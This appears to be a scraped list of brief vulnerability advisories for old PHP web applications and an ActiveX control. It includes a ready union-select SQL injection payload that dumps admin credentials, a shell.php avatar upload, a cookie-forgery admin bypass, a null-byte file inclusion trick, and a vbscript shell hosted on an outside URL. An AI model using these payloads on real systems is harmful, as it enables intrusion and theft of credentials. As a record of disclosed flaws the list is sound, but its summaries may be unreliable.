SG Real Estate Portal 2.0 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The exploit code takes the target URL and user ID as input and then uses the SQL injection vulnerability to extract the username and password of the admin user.
Students and teachers can upload a shell.php as the avatar and next execute it as http://site/upload/student/avatars/shell.php or http://site/upload/professor/avatars/shell.php. In all sites tested, the upload directory is accessible by web.
Multiple files in Micronation Banking System(minba) 1.5.0 are vulnerable to Remote File Inclusion. An example of vulnerable code is line 3 of minba/utility/utgn_message.php file which contains require_once("$minsoft_path/utility/utgn_config.php");
SG Real Estate Portal 2.0 is vulnerable to Blind SQL Injection/Local File Inclusion. An attacker can exploit this vulnerability by sending malicious requests to the server. For example, an attacker can send a malicious request to the server with a Local File parameter containing a relative path to the file they want to access. This can be done by appending %00 to the end of the malicious request. This vulnerability can be exploited by an attacker to gain access to sensitive information stored on the server.
The first vulnerability is caused due to the CExpressViewerControl class (AdView.dll v9.0.0.96) which provide the insecure SaveAS() method which allows to store locally files with arbitrary extension. The second one is related to the ApplyPatch() one inside the UpdateEngine class (LiveUpdate16.DLL, 17.2.56 ??... this is a shared one) which allows to launch an arbitrary executable by the second argument. Note, that the first one, alone, allows arbitrary code execution. The impact of the second one is limited if you cannot specify command arguments or launch a file of yours. The embedded dwf file (located at the url http://retrogod.altervista.org/suntzu.dwf) has been created modifying an existing one, replacing a .png resource file with a vbscript shell through the following script (note the PCLZIP_OPT_NO_COMPRESSION flag, this has been used to preserve the code, note also the dwg files are essentially zips).
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'catid' in the URL. The crafted query can be sent as 'catid=-1 union select concat(username,0x3a,password),2 FROM cfaq_admin--' which will return the username and password of the admin. The attacker can then use the credentials to login to the admin panel at www.[target].com/Script//admin.php
The vulnerability is caused due to the improper validation of user-supplied input in the 'rss' parameter of the 'rss.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks.
PG Matchmaking Script is prone to a multiple remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Post Comments v3.0 is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting the PostCommentsAdmin cookie to 'logged' and setting the path to '/'. This will allow the attacker to gain access to the admin panel.
A remote SQL injection vulnerability exists in Arcadem Pro (articlecat). An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to unauthorized information or to manipulate data. The malicious SQL statements can be sent to the vulnerable application via the 'articlecat' parameter in the 'loadpage' parameter of the vulnerable application.
Services By CQR